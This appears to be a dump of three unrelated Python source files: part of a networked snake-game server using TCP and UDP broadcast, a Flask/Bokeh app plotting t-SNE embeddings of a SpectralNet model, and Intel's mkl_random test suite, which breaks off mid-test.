with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.bind((settings.MY_IP, c.PORT))
s.listen()
while 1:
conn, addr = s.accept()
threading.Thread(target=listen_connection, args=[
conn], daemon=True).start()
def listen_connection(conn):
with conn:
while True:
data = conn.recv(c.BUFFER_SIZE)
if not data:
continue
__handle_received_TCP(data)
def __handle_received_TCP(data: bytes):
try:
msgPacket = json.loads(data.decode('utf-8'))
if msgPacket['type'] == c.JOIN_REQUEST:
__handle_join_request(msgPacket)
elif msgPacket['type'] == c.LEAVE_REQUEST:
__handle_leave_request(msgPacket)
elif msgPacket['type'] == c.MOVE_REQUEST:
__handle_move_request(msgPacket)
except Exception as e:
print(e)
def __send_UDP(msgPacket: dict):
global message_index
msgPacket['msg_ind'] = message_index
message_index += 1
# print('SENT:', msgPacket)
msgPacketBytes = json.dumps(msgPacket).encode(encoding='utf-8')
for _ in range(2):
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
s.bind(('', 0))
s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
broadcast_str = '<broadcast>'
if settings.MY_IP.startswith('25.'):
broadcast_str = '25.255.255.255'
s.sendto(msgPacketBytes, (broadcast_str, c.PORT))
def __send_food_spawn(i: int, j: int):
msgPacket = {'type': c.FOOD_SPAWN, 'i': i, 'j': j}
__send_UDP(msgPacket)
def __handle_join_request(msgPacket: dict):
if game.snake_count() >= c.PLAYER_LIMIT or started:
return
print('JOINED:', msgPacket)
global next_snake_id
head_i, head_j, i, j = game.get_coord_for_snake()
game.spawn_snake(snake_id=next_snake_id, snake_ip=msgPacket['ip'], name=msgPacket['name'], placement=[
(head_i, head_j), (i, j)])
next_snake_id += 1
msgPacket = {
"type": c.SNAKES,
"snakes": game.get_snakes_json(),
}
__send_UDP(msgPacket)
def __handle_leave_request(msgPacket: dict):
__remove_snake(msgPacket['id'])
def __handle_move_request(msgPacket: dict):
# Snake could be removed by snake_2_food
if game.snake_exists(msgPacket['id']):
if msgPacket['id'] in snake_timers:
snake_timers[msgPacket['id']].cancel()
snake_timers.pop(msgPacket['id'])
curr_snake_movements[msgPacket['id']] = msgPacket['dir']
__progress_if_available()
def __check_movement_diff(snake_id: int, curr_time: float):
# No movement in-between
if game.snake_exists(snake_id) and snakes_last_timestamp[snake_id] == curr_time:
print('LATENCY KICK:', str(snake_id))
__remove_snake(snake_id)
def __remove_snake(snake_id: int):
print('REMOVING SNAKE:', str(snake_id))
if game.snake_exists(snake_id):
game.remove_snake(snake_id)
if snake_id in curr_snake_movements:
curr_snake_movements.pop(snake_id)
if snake_id in snake_timers:
snake_timers[snake_id].cancel()
snake_timers.pop(snake_id)
msgPacket = {
"type": c.SNAKE_LEFT,
"id": snake_id
}
__send_UDP(msgPacket)
__progress_if_available()
def __progress_if_available():
if len(curr_snake_movements) == game.snake_count():
threading.Thread(target=__finalize_time_step, daemon=True).start()
def __finalize_time_step():
global time_step
for snake_id in curr_snake_movements.keys():
curr_time = time.time()
snakes_last_timestamp[snake_id] = curr_time
t = Timer(c.MAX_MOVEMENT_DIFF, __check_movement_diff,
args=[snake_id, curr_time])
snake_timers[snake_id] = t
t.start()
completed_steps[time_step] = 1
time_step += 1
game.apply_snake_movements([(int(id), dir)
for id, dir in curr_snake_movements.items()])
msgPacket = {'type': c.MOVEMENTS, 'movements': curr_snake_movements}
__send_UDP(msgPacket)
curr_snake_movements.clear()
food_deficit = max(0, game.snake_count() - game.food_count())
for _ in range(food_deficit):
i, j = game.get_coord_for_food()
game.spawn_food(coordinate=(i, j))
__send_food_spawn(i, j)
|
bokeh-server.py
|
import argparse
import keras.backend.tensorflow_backend as ktf
import numpy as np
import tensorflow as tf
from bokeh.embed import server_document
from bokeh.layouts import column, gridplot
from bokeh.models import ColumnDataSource, Slider
from bokeh.plotting import figure
from bokeh.sampledata.sea_surface_temperature import sea_surface_temperature
from bokeh.server.server import Server
from bokeh.themes import Theme
from flask import Flask, render_template
from keras import backend as K
from keras.layers import Input
from tornado.ioloop import IOLoop
from applications.config import get_spectralnet_config, get_siamese_config
from applications.plot_embedding import plot_embedding_bokeh
from core import networks
from core.data import load_spectral_data, load_siamese_data
# PARSE ARGUMENTS
from core.util import get_session
from sklearn import manifold
from core.data import get_common_data, load_base_data
from bokeh.layouts import column
from bokeh.models import Button, CustomJS
from bokeh.plotting import figure
# Example defined here: https://github.com/bokeh/bokeh/blob/1.3.4/examples/howto/server_embed/flask_embed.py
app = Flask(__name__)
parser = argparse.ArgumentParser()
parser.add_argument('--gpu', type=str, help='gpu number to use', default='')
parser.add_argument('--gpu_memory_fraction', type=float, help='gpu percentage to use', default='0.8')
parser.add_argument('--dset', type=str, help='dataset to use', default='mnist')
args = parser.parse_args()
ktf.set_session(get_session(args.gpu_memory_fraction))
K.set_learning_phase(0)
params = get_spectralnet_config(args)
params['train_set_fraction'] = 0.8
data = load_spectral_data(params['data_path'], args.dset)
x_train, y_train, x_val, y_val, x_test, y_test = data['spectral']['train_and_test']
x_train_unlabeled, y_train_unlabeled, x_train_labeled, y_train_labeled = data['spectral'][
'train_unlabeled_and_labeled']
x_val_unlabeled, y_val_unlabeled, x_val_labeled, y_val_labeled = data['spectral']['val_unlabeled_and_labeled']
batch_sizes = {
'Unlabeled': x_train.shape[0],
'Labeled': x_train.shape[0],
'Orthonorm': x_train.shape[0],
}
input_shape = x_train.shape[1:]
inputs = {
'Unlabeled': Input(shape=input_shape, name='UnlabeledInput'),
'Labeled': Input(shape=input_shape, name='LabeledInput'),
'Orthonorm': Input(shape=input_shape, name='OrthonormInput'),
}
y_true = tf.placeholder(tf.float32, shape=(None, params['n_clusters']), name='y_true')
# Load Siamese network
if params['affinity'] == 'siamese':
siamese_input_shape = [params['n_clusters']]
siamese_inputs = {
'Unlabeled': Input(shape=siamese_input_shape, name='UnlabeledInput'),
'Labeled': Input(shape=siamese_input_shape, name='LabeledInput'),
}
siamese_net = networks.SiameseNet(siamese_inputs, params['arch'], params.get('siam_reg'), y_true,
params['siamese_model_path'])
else:
siamese_net = None
y_train, x_train, p_train, \
y_test, x_test, \
y_val, x_val, p_val, \
y_train_labeled, x_train_labeled, \
y_val_labeled, x_val_labeled, \
y_train_unlabeled, x_train_unlabeled, \
y_val_unlabeled, x_val_unlabeled, \
train_val_split = get_common_data(params, load_base_data(params, params['dset']))
def modify_doc(doc):
p1 = figure(x_axis_type="datetime", title="t-SNE embedding of the digits - original")
p1.xaxis.axis_label = 'x1'
p1.yaxis.axis_label = 'x2'
p1.legend.location = "top_left"
p2 = figure(x_axis_type="datetime", title="t-SNE embedding of the digits - siamese")
p2.xaxis.axis_label = 'x1'
p2.yaxis.axis_label = 'x2'
p2.legend.location = "top_left"
def callback(attr, old, sample_size):
x_test = x_val[:sample_size, :]
y_test = y_val[:sample_size]
x_affinity = siamese_net.predict(x_test, batch_sizes)
# ----------------------------------------------------------------------
# t-SNE embedding of the digits dataset
print("Computing t-SNE embeddings for sample size %s" % sample_size)
tsne = manifold.TSNE(n_components=2, init='pca', random_state=0)
X_tsne = tsne.fit_transform(x_test)
plot_embedding_bokeh(X_tsne, y_test, p1)
X_affinity_tsne = tsne.fit_transform(x_affinity)
plot_embedding_bokeh(X_affinity_tsne, y_test, p2)
print("Finished Plotting for sample size %s" % sample_size)
b = Button(label="Reset", button_type="success", width=300)
b.js_on_click(CustomJS(args=dict(p1=p1, p2=p2), code="""
console.log("start CustomJS");
p1.reset.emit();
p2.reset.emit();
console.log("finish CustomJS");
"""))
default_sample_size = 100
slider = Slider(start=100, end=1000, value=default_sample_size, step=100, title="Sample Size")
slider.on_change('value', callback)
callback(None, None, default_sample_size)
grid = gridplot([[p1, p2]], plot_width=400, plot_height=400)
doc.add_root(column(slider, grid,b))
doc.theme = Theme(filename="theme.yaml")
@app.route('/', methods=['GET'])
def bkapp_page():
script = server_document('http://localhost:5006/bkapp')
return render_template("embed.html", script=script, template="Flask")
def bk_worker():
# Can't pass num_procs > 1 in this configuration. If you need to run multiple
# processes, see e.g. flask_gunicorn_embed.py
server = Server({'/bkapp': modify_doc}, io_loop=IOLoop(), allow_websocket_origin=["127.0.0.1:8000"])
server.start()
server.io_loop.start()
from threading import Thread
Thread(target=bk_worker).start()
if __name__ == '__main__':
app.run(port=8000)
|
test_random.py
|
#!/usr/bin/env python
# Copyright (c) 2017-2019, Intel Corporation
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of Intel Corporation nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from __future__ import division, absolute_import, print_function
import numpy as np
from numpy.testing import (
TestCase, run_module_suite, assert_, assert_raises, assert_equal,
assert_warns, suppress_warnings)
import mkl_random as rnd
from numpy.compat import asbytes
import sys
import warnings
class TestSeed_Intel(TestCase):
def test_scalar(self):
evs_zero_seed = {
'MT19937' : 844, 'SFMT19937' : 857,
'WH' : 0, 'MT2203' : 890,
'MCG31' : 0, 'R250' : 229,
'MRG32K3A' : 0, 'MCG59' : 0 }
for brng_algo in evs_zero_seed:
s = rnd.RandomState(0, brng = brng_algo)
assert_equal(s.get_state()[0], brng_algo)
assert_equal(s.randint(1000), evs_zero_seed[brng_algo])
evs_max_seed = {
'MT19937' : 635, 'SFMT19937' : 25,
'WH' : 100, 'MT2203' : 527,
'MCG31' : 0, 'R250' : 229,
'MRG32K3A' : 961, 'MCG59' : 0 }
for brng_algo in evs_max_seed:
s = rnd.RandomState(4294967295, brng = brng_algo)
assert_equal(s.get_state()[0], brng_algo)
assert_equal(s.randint(1000), evs_max_seed[brng_algo])
def test_array(self):
s = rnd.RandomState(range(10), brng='MT19937')
assert_equal(s.randint(1000), 410)
s = rnd.RandomState(np.arange(10), brng='MT19937')
assert_equal(s.randint(1000), 410)
s = rnd.RandomState([0], brng='MT19937')
assert_equal(s.randint(1000), 844)
s = rnd.RandomState([4294967295], brng='MT19937')
assert_equal(s.randint(1000), 635)
def test_invalid_scalar(self):
# seed must be an unsigned 32 bit integers
assert_raises(TypeError, rnd.RandomState, -0.5)
assert_raises(ValueError, rnd.RandomState, -1)
def test_invalid_array(self):
# seed must be an unsigned 32 bit integers
assert_raises(TypeError, rnd.RandomState, [-0.5])
assert_raises(ValueError, rnd.RandomState, [-1])
assert_raises(ValueError, rnd.RandomState, [4294967296])
assert_raises(ValueError, rnd.RandomState, [1, 2, 4294967296])
assert_raises(ValueError, rnd.RandomState, [1, -2, 4294967296])
def test_non_deterministic(self):
rs = rnd.RandomState(brng='nondeterministic')
rs.rand(10)
rs.randint(0, 10)
class TestBinomial_Intel(TestCase):
def test_n_zero(self):
# Tests the corner case of n == 0 for the binomial distribution.
# binomial(0, p) should be zero for any p in [0, 1].
# This test addresses issue #3480.
zeros = np.zeros(2, dtype='int')
for p in [0, .5, 1]:
assert_(rnd.binomial(0, p) == 0)
np.testing.assert_array_equal(rnd.binomial(zeros, p), zeros)
def test_p_is_nan(self):
# Issue #4571.
assert_raises(ValueError, rnd.binomial, 1, np.nan)
class TestMultinomial_Intel(TestCase):
def test_basic(self):
rnd.multinomial(100, [0.2, 0.8])
def test_zero_probability(self):
rnd.multinomial(100, [0.2, 0.8, 0.0, 0.0, 0.0])
def test_int_negative_interval(self):
assert_(-5 <= rnd.randint(-5, -1) < -1)
x = rnd.randint(-5, -1, 5)
assert_(np.all(-5 <= x))
assert_(np.all(x < -1))
def test_size(self):
# gh-3173
p = [0.5, 0.5]
assert_equal(rnd.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(rnd.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(rnd.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(rnd.multinomial(1, p, [2, 2]).shape, (2, 2, 2))
assert_equal(rnd.multinomial(1, p, (2, 2)).shape, (2, 2, 2))
assert_equal(rnd.multinomial(1, p, np.array((2, 2))).shape,
(2, 2, 2))
assert_raises(TypeError, rnd.multinomial, 1, p,
np.float(1))
class TestSetState_Intel(TestCase):
def setUp(self):
self.seed = 1234567890
self.prng = rnd.RandomState(self.seed)
self.state = self.prng.get_state()
def test_basic(self):
old = self.prng.tomaxint(16)
self.prng.set_state(self.state)
new = self.prng.tomaxint(16)
assert_(np.all(old == new))
def test_gaussian_reset(self):
# Make sure the cached every-other-Gaussian is reset.
old = self.prng.standard_normal(size=3)
self.prng.set_state(self.state)
new = self.prng.standard_normal(size=3)
assert_(np.all(old == new))
def test_gaussian_reset_in_media_res(self):
# When the state is saved with a cached Gaussian, make sure the
# cached Gaussian is restored.
self.prng.standard_normal()
state = self.prng.get_state()
old = self.prng.standard_normal(size=3)
self.prng.set_state(state)
new = self.prng.standard_normal(size=3)
assert_(np.all(old == new))
def test_backwards_compatibility(self):
# Make sure we can accept old state tuples that do not have the
# cached Gaussian value.
if len(self.state) == 5:
old_state = self.state[:-2]
x1 = self.prng.standard_normal(size=16)
self.prng.set_state(old_state)
x2 = self.prng.standard_normal(size=16)
self.prng.set_state(self.state)
x3 = self.prng.standard_normal(size=16)
assert_(np.all(x1 == x2))
assert_(np.all(x1 == x3))
def test_negative_binomial(self):
# Ensure that the negative binomial results take floating point
# arguments without truncation.
self.prng.negative_binomial(0.5, 0.5)
class TestRandint_Intel(TestCase):
rfunc = rnd.randint
# valid integer/boolean types
itype = [np.bool_, np.int8, np.uint8, np.int16, np.uint16,
np.int32, np.uint32, np.int64, np.uint64]
def test_unsupported_type(self):
assert_raises(TypeError, self.rfunc, 1, dtype=np.float)
def test_bounds_checking(self):
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
assert_raises(ValueError, self.rfunc, lbnd - 1, ubnd, dtype=dt)
assert_raises(ValueError, self.rfunc, lbnd, ubnd + 1, dtype=dt)
assert_raises(ValueError, self.rfunc, ubnd, lbnd, dtype=dt)
assert_raises(ValueError, self.rfunc, 1, 0, dtype=dt)
def test_rng_zero_and_extremes(self):
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
tgt = ubnd - 1
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
tgt = lbnd
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
tgt = (lbnd + ubnd)//2
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
def test_in_bounds_fuzz(self):
# Don't use fixed seed
rnd.seed()
for dt in self.itype[1:]:
for ubnd in [4, 8, 16]:
vals = self.rfunc(2, ubnd, size=2**16, dtype=dt)
assert_(vals.max() < ubnd)
assert_(vals.min() >= 2)
vals = self.rfunc(0, 2, size=2**16, dtype=np.bool)
assert_(vals.max() < 2)
assert_(vals.min() >= 0)
def test_repeatability(self):
import hashlib
# We use a md5 hash of generated sequences of 1000 samples
# in the range [0, 6) for all but np.bool, where the range
# is [0, 2). Hashes are for little endian numbers.
tgt = {'bool': '4fee98a6885457da67c39331a9ec336f',
'int16': '80a5ff69c315ab6f80b03da1d570b656',
'int32': '15a3c379b6c7b0f296b162194eab68bc',
'int64': 'ea9875f9334c2775b00d4976b85a1458',
'int8': '0f56333af47de94930c799806158a274',
'uint16': '80a5ff69c315ab6f80b03da1d570b656',
'uint32': '15a3c379b6c7b0f296b162194eab68bc',
'uint64': 'ea9875f9334c2775b00d4976b85a1458',
'uint8': '0f56333af47de94930c799806158a274'}
for dt in self.itype[1:]:
rnd.seed(1234, brng='MT19937')
# view as little endian for hash
if sys.byteorder == 'little':
val = self.rfunc(0, 6, size=1000, dtype=dt)
else:
val = self.rfunc(0, 6, size=1000, dtype=dt).byteswap()
res = hashlib.md5(val.view(np.int8)).hexdigest()
print("")
assert_(tgt[np.dtype(dt).name] == res)
# bools do not depend on endianess
rnd.seed(1234, brng='MT19937')
val = self.rfunc(0, 2, size=1000, dtype=np.bool).view(np.int8)
res = hashlib.md5(val).hexdigest()
assert_(tgt[np.dtype(np.bool).name] == res)
def test_respect_dtype_singleton(self):
# See gh-7203
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
sample = self.rfunc(lbnd, ubnd, dtype=dt)
self.assertEqual(sample.dtype, np.dtype(dt))
for dt in (np.bool, np.int, np.long):
lbnd = 0 if dt is np.bool else np.iinfo(dt).min
ubnd = 2 if dt is np.bool else np.iinfo(dt).max + 1
# gh-7284: Ensure that we get Python data types
sample = self.rfunc(lbnd, ubnd, dtype=dt)
self.assertFalse(hasattr(sample, 'dtype'))
self.assertEqual(type(sample), dt)
class TestRandomDist_Intel(TestCase):
# Make sure the random distribution returns the correct value for a
# given seed. Low value of decimal argument is intended, since functional
# transformations's implementation or approximations thereof used to produce non-uniform
# random variates can vary across platforms, yet be statistically indistinguishable to the end user,
# that is no computationally feasible statistical experiment can detect the difference.
def setUp(self):
self.seed = 1234567890
self.brng = 'SFMT19937'
def test_rand(self):
rnd.seed(self.seed, self.brng)
actual = rnd.rand(3, 2)
desired = np.array([[0.9838694715872407, 0.019142669625580311],
[0.1767608025111258, 0.70966427633538842],
[0.518550637178123, 0.98780936631374061]])
np.testing.assert_array_almost_equal(actual, desired, decimal=10)
def test_randn(self):
rnd.seed(self.seed, self.brng)
actual = rnd.randn(3, 2)
desired = np.array([[2.1411609928913298, -2.0717866791744819],
[-0.92778018318550248, 0.55240420724917727],
[0.04651632135517459, 2.2510674226058036]])
np.testing.assert_array_almost_equal(actual, desired, decimal=10)
def test_randint(self):
rnd.seed(self.seed, self.brng)
actual = rnd.randint(-99, 99, size=(3, 2))
desired = np.array([[95, -96], [-65, 41], [3, 96]])
np.testing.assert_array_equal(actual, desired)
def test_random_integers(self):
rnd.seed(self.seed, self.brng)
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
actual = rnd.random_integers(-99, 99, size=(3, 2))
assert_(len(w) == 1)
desired = np.array([[96, -96], [-64, 42], [4, 97]])
np.testing.assert_array_equal(actual, desired)
def test_random_integers_max_int(self):
# Tests whether random_integers can generate the
# maximum allowed Python int that can be converted
# into a C long. Previous implementations of this
# method have thrown an OverflowError when attempting
# to generate this integer.
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
actual = rnd.random_integers(np.iinfo('l').max,
np.iinfo('l').max)
assert_(len(w) == 1)
desired = np.iinfo('l').max
np.testing.assert_equal(actual, desired)
def test_random_integers_deprecated(self):
with warnings.catch_warnings():
warnings.simplefilter("error", DeprecationWarning)
# DeprecationWarning raised with high == None
assert_raises(DeprecationWarning,
rnd.random_integers,
np.iinfo('l').max)
# DeprecationWarning raised with high != None
assert_raises(DeprecationWarning,
rnd.random_integers,
np.iinfo('l').max, np.iinfo('l').max)
def test_random_sample(self):
rnd.seed(self.seed, self.brng)
actual = rnd.random_sample((3, 2))
desired = np.array([[0.9838694715872407, 0.01914266962558031],
[0.1767608025111258, 0.7096642763353884],
[0.518550637178123, 0.9878093663137406]])
np.testing.assert_array_almost_equal(actual, desired, decimal=10)
def test_choice_uniform_replace(self):
rnd.seed(self.seed, self.brng)
actual = rnd.choice(4, 4)
desired = np.array([3, 0, 0, 2])
np.testing.assert_array_equal(actual, desired)
def test_choice_nonuniform_replace(self):
rnd.seed(self.seed, self.brng)
actual = rnd.choice(4, 4, p=[0.4, 0.4, 0.1, 0.1])
desired = np.array([3, 0, 0, 1])
np.testing.assert_array_equal(actual, desired)
def test_choice_uniform_noreplace(self):
rnd.seed(self.seed, self.brng)
actual = rnd.choice(4, 3, replace=False)
desired = np.array([2, 1, 3])
np.testing.assert_array_equal(actual, desired)
def test_choice_nonuniform_noreplace(self):
rnd.seed(self.seed, self.brng)
actual = rnd.choice(4, 3, replace=False,
p=[0.1, 0.3, 0.5, 0.1])
desired = np.array([3, 0, 1])
np.testing.assert_array_equal(actual, desired)
def test_choice_noninteger(self):
rnd.seed(self.seed, self.brng)
actual = rnd.choice(['a', 'b', 'c', 'd'], 4)
desired = np.array(['d', 'a', 'a', 'c'])
np.testing.assert_array_equal(actual, desired)
def test_choice_exceptions(self):
sample = rnd.choice
assert_raises(ValueError, sample, -1, 3)
assert_raises(ValueError, sample, 3., 3)
assert_raises(ValueError, sample, [[1, 2], [3, 4]], 3)
assert_raises(ValueError, sample, [], 3)
assert_raises(ValueError, sample, [1, 2, 3, 4], 3,
p=[[0.25, 0.25], [0.25, 0.25]])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4, 0.2])
assert_raises(ValueError, sample, [1, 2], 3, p=[1.1, -0.1])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4])
assert_raises(ValueError, sample, [1, 2, 3], 4, replace=False)
assert_raises(ValueError, sample, [1, 2, 3], 2, replace=False,
p=[1, 0, 0])
def test_choice_return_shape(self):
p = [0.1, 0.9]
# Check scalar
assert_(np.isscalar(rnd.choice(2, replace=True)))
assert_(np.isscalar(rnd.choice(2, replace=False)))
assert_(np.isscalar(rnd.choice(2, replace=True, p=p)))
assert_(np.isscalar(rnd.choice(2, replace=False, p=p)))
assert_(np.isscalar(rnd.choice([1, 2], replace=True)))
assert_(rnd.choice([None], replace=True) is None)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(rnd.choice(arr, replace=True) is a)
# Check 0-d array
s = tuple()
assert_(not np.isscalar(rnd.choice(2, s, replace=True)))
assert_(not np.isscalar(rnd.choice(2, s, replace=False)))
assert_(not np.isscalar(rnd.choice(2, s, replace=True, p=p)))
assert_(not np.isscalar(rnd.choice(2, s, replace=False, p=p)))
assert_(not np.isscalar(rnd.choice([1, 2], s, replace=True)))
assert_(rnd.choice([None], s, replace=True).ndim == 0)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(rnd.choice(arr, s, replace=True).item() is a)
# Check multi dimensional array
s = (2, 3)
p = [0.1, 0.1, 0.1, 0.1, 0.4, 0.2]
assert_(rnd.choice(6, s, replace=True).shape, s)
assert_(rnd.choice(6, s, replace=False).shape, s)
assert_(rnd.choice(6, s, replace=True, p=p).shape, s)
assert_(rnd.choice(6, s, replace=False, p=p).shape, s)
assert_(rnd.choice(np.arange(6), s, replace=True).shape, s)
def test_bytes(self):
rnd.seed(self.seed, self.brng)
actual = rnd.bytes(10)
desired = asbytes('\xa4\xde\xde{\xb4\x88\xe6\x84*2')
np.testing.assert_equal(actual, desired)
def test_shuffle(self):
# Test lists, arrays (of various dtypes), and multidimensional versions
# of both, c-contiguous or not:
for conv in [lambda x: np.array([]),
lambda x: x,
lambda x: np.asarray(x).astype(np.int8),
lambda x: np.asarray(x).astype(np.float32),
lambda x: np.asarray(x).astype(np.complex64),
lambda x: np.asarray(x).astype(object),
lambda x: [(i, i) for i in x],
lambda x: np.asarray([[i, i] for i in x]),
lambda x: np.vstack([x, x]).T,
# gh-4270
lambda x: np.asarray([(i, i) for i in x],
[("a", object, (1,)),
("b", np.int32, (1,))])]:
rnd.seed(self.seed, self.brng)
alist = conv([1, 2, 3, 4, 5, 6, 7, 8, 9, 0])
rnd.shuffle(alist)
actual = alist
desired = conv([9, 8, 5, 1, 6, 4, 7, 2, 3, 0])
np.testing.assert_array_equal(actual, desired)
def test_shuffle_masked(self):
# gh-3263
a = np.ma.masked_values(np.reshape(range(20), (5,4)) % 3 - 1, -1)
b = np.ma.masked_values(np.arange(20) % 3 - 1, -1)
a_orig = a.copy()
b_orig = b.copy()
for i in range(50):
rnd.shuffle(a)
assert_equal(
sorted(a.data[~a.mask]), sorted(a_orig.data[~a_orig.mask]))
rnd.shuffle(b)
assert_equal(
sorted(b.data[~b.mask]), sorted(b_orig.data[~b_orig.mask]))
def test_beta(self):
rnd.seed(self.seed, self.brng)
actual = rnd.beta(.1, .9, size=(3, 2))
desired = np.array(
[[0.9856952034381025, 4.35869375658114e-08],
[0.0014230232791189966, 1.4981856288121975e-06],
[1.426135763875603e-06, 4.5801786040477326e-07]])
np.testing.assert_array_almost_equal(actual, desired, decimal=10)
def test_binomial(self):
rnd.seed(self.seed, self.brng)
actual = rnd.binomial(100.123, .456, size=(3, 2))
desired = np.array([[43, 48], [55, 48], [46, 53]])
np.testing.assert_array_equal(actual, desired)
def test_chisquare(self):
rnd.seed(self.seed, self.brng)
actual = rnd.chisquare(50, size=(3, 2))
desired = np.array([[50.955833609920589, 50.133178918244099],
[61.513615847062013, 50.757127871422448],
[52.79816819717081, 49.973023331993552]])
np.testing.assert_array_almost_equal(actual, desired, decimal=7)
def test_dirichlet(self):
rnd.seed(self.seed, self.brng)
alpha = np.array([51.72840233779265162, 39.74494232180943953])
actual = rnd.dirichlet(alpha, size=(3, 2))
desired = np.array([[[0.6332947001908874, 0.36670529980911254],
[0.5376828907571894, 0.4623171092428107]],
[[0.6835615930093024, 0.3164384069906976],
[0.5452378139016114, 0.45476218609838875]],
[[0.6498494402738553, 0.3501505597261446],
[0.5622024400324822, 0.43779755996751785]]])
np.testing.assert_array_almost_equal(actual, desired, decimal=10)
def test_dirichlet_size(self):
# gh-3173
p = np.array([51.72840233779265162, 39.74494232180943953])
assert_equal(rnd.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(rnd.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(rnd.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(rnd.dirichlet(p, [2, 2]).shape, (2, 2, 2))
assert_equal(rnd.dirichlet(p, (2, 2)).shape, (2, 2, 2))
assert_equal(rnd.dirichlet(p, np.array((2, 2))).shape, (2, 2, 2))
assert_raises(TypeError, rnd.dirichlet, p, np.float(1))
def test_exponential(self):
rnd.seed(self.seed, self.brng)
actual = rnd.exponential(1.1234, size=(3, 2))
desired = np.array([[0.01826877748252199, 4.4439855151117005],
[1.9468048583654507, 0.38528493864979607],
[0.7377565464231758, 0.013779117663987912]])
np.testing.assert_array_almost_equal(actual, desired, decimal=10)
def test_f(self):
rnd.seed(self.seed, self.brng)
actual = rnd.f(12, 77, size=(3, 2))
desired = np.array([[1.325076177478387, 0.8670927327120197],
[2.1190792007836827, 0.9095296301824258],
[1.4953697422236187, 0.9547125618834837]])
np.testing.assert_array_almost_equal(actual, desired, decimal=9)
def test_gamma(self):
rnd.seed(self.seed, self.brng)
actual = rnd.gamma(5, 3, size=(3, 2))
desired = np.array([[15.073510060334929, 14.525495858042685],
[22.73897210140115, 14.94044782480266],
[16.327929995271095, 14.419692564592896]])
np.testing.assert_array_almost_equal(actual, desired, decimal=7)
def test_geometric(self):
rnd.seed(self.seed, self.brng)
actual = rnd.geometric(.123456789, size=(3, 2))
desired = np.array([[0, 30], [13, 2], [4, 0]])
np.testing.assert_array_equal(actual, desired)
def test_gumbel(self):
rnd.seed(self.seed, self.brng)
actual = rnd.gumbel(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[-8.114386462751979, 2.873840411460178],
[1.2231161758452016, -2.0168070493213532],
[-0.7175455966332102, -8.678464904504784]])
np.testing.assert_array_almost_equal(actual, desired, decimal=7)
def test_hypergeometric(self):
rnd.seed(self.seed, self.brng)
actual = rnd.hypergeometric(10.1, 5.5, 14, size=(3, 2))
desired = np.array([[10, 9], [9, 10], [9, 10]])
np.testing.assert_array_equal(actual, desired)
# Test nbad = 0
actual = rnd.hypergeometric(5, 0, 3, size=4)
desired = np.array([3, 3, 3, 3])
np.testing.assert_array_equal(actual, desired)
actual = rnd.hypergeometric(15, 0, 12, size=4)
desired = np.array([12, 12, 12, 12])
np.testing.assert_array_equal(actual, desired)
# Test ngood = 0
actual = rnd.hypergeometric(0, 5, 3, size=4)
desired = np.array([0, 0, 0, 0])
np.testing.assert_array_equal(actual, desired)
actual = rnd.hypergeometric(0, 15, 12, size=4)
desired = np.array([0, 0, 0, 0])
np.testing.assert_array_equal(actual, desired)
def test_laplace(self):
rnd.seed(self.seed, self.brng)
actual = rnd.laplace(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[0.15598087210935016, -3.3424589282252994],
[-1.189978401356375, 3.0607925598732253],
[0.0030946589024587745, 3.14795824463997]])
np.testing.assert_array_almost_equal(actual, desired, decimal=10)
def test_logistic(self):
rnd.seed(self.seed, self.brng)
actual = rnd.logistic(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[8.345015961402696, -7.749557532940552],
